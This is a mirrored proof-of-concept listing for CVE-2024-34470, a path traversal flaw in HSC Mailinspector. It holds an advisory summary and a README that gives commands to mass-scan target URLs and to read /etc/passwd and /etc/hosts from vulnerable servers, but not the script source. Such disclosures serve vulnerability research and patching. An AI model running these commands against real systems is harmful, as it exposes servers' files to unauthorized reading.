Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-34470 PoC — HSC Cybersecurity HC Mailinspector 路径遍历漏洞

Source
https://github.com/Mr-r00t11/CVE-2024-34470
Associated Vulnerability
Title:HSC Cybersecurity HC Mailinspector 路径遍历漏洞 (CVE-2024-34470)
Description:HSC Cybersecurity HC Mailinspector是HSC Cybersecurity公司的一个云电子邮件安全解决方案。 HSC Cybersecurity HC Mailinspector 5.2.17-3 到 v.5.2.18版本存在路径遍历漏洞,该漏洞源于/public/loader.php 中存在未经身份验证的路径遍历漏洞,path 参数没有正确过滤传递的文件和目录是否是webroot的一部分,从而允许攻击者读取服务器上的任意文件。
Readme
# HSC MailInspector - CVE-2024-34470
___
A critical vulnerability has been found in HSC Mailinspector up to version 5.2.18. This vulnerability affects an unknown functionality of the file /public/loader.php. Manipulating the 'path' argument with an unknown input leads to a path traversal vulnerability. According to CWE, this issue is classified as CWE-22. The product uses external input to construct a pathname intended to identify a file or directory located beneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location outside of the restricted directory. This affects confidentiality, integrity, and availability.
___
## Installation

**Clone the repository:**
```bash
git clone https://CVE-2024-34470.git
cd CVE-2024-34470
```

**Install the dependencies**

Make sure you have Python and pip installed. Then, run:
```bash
pip install -r requirements.txt
```

- This will install all the necessary dependencies to run the script.
___
## Use

### Script Description

To perform a search for multiple targets using a text file, use the script **Massive_CVE-2024-34470.py**

```powershell
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null
```

The format in which the _urls.txt_ file should be is as follows:
```powershell
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443
```

![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_1.png)
___
Once the vulnerable targets have been identified, we use the script called **CVE-2024-34470.py** to exploit and display the content specified through the terminal.

```python
# Read file content passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null

# Read file content hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts
```

![[screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_2.png)
File Snapshot

 [4.0K]  /data/pocs/2594c2bf974117457173e63b63fb12d058eff5f8
├── [1.6K]  CVE-2024-34470.py
├── [4.0K]  img
│   ├── [1.2M]  Screenshot_1.1.png
│   ├── [1.2M]  Screenshot_1.png
│   ├── [ 81K]  screenshot_2.png
│   └── [467K]  Screenshot_2.png
├── [3.6K]  Massive_CVE-2024-34470.py
├── [1.9K]  README.md
└── [  36]  requirements.txt

1 directory, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.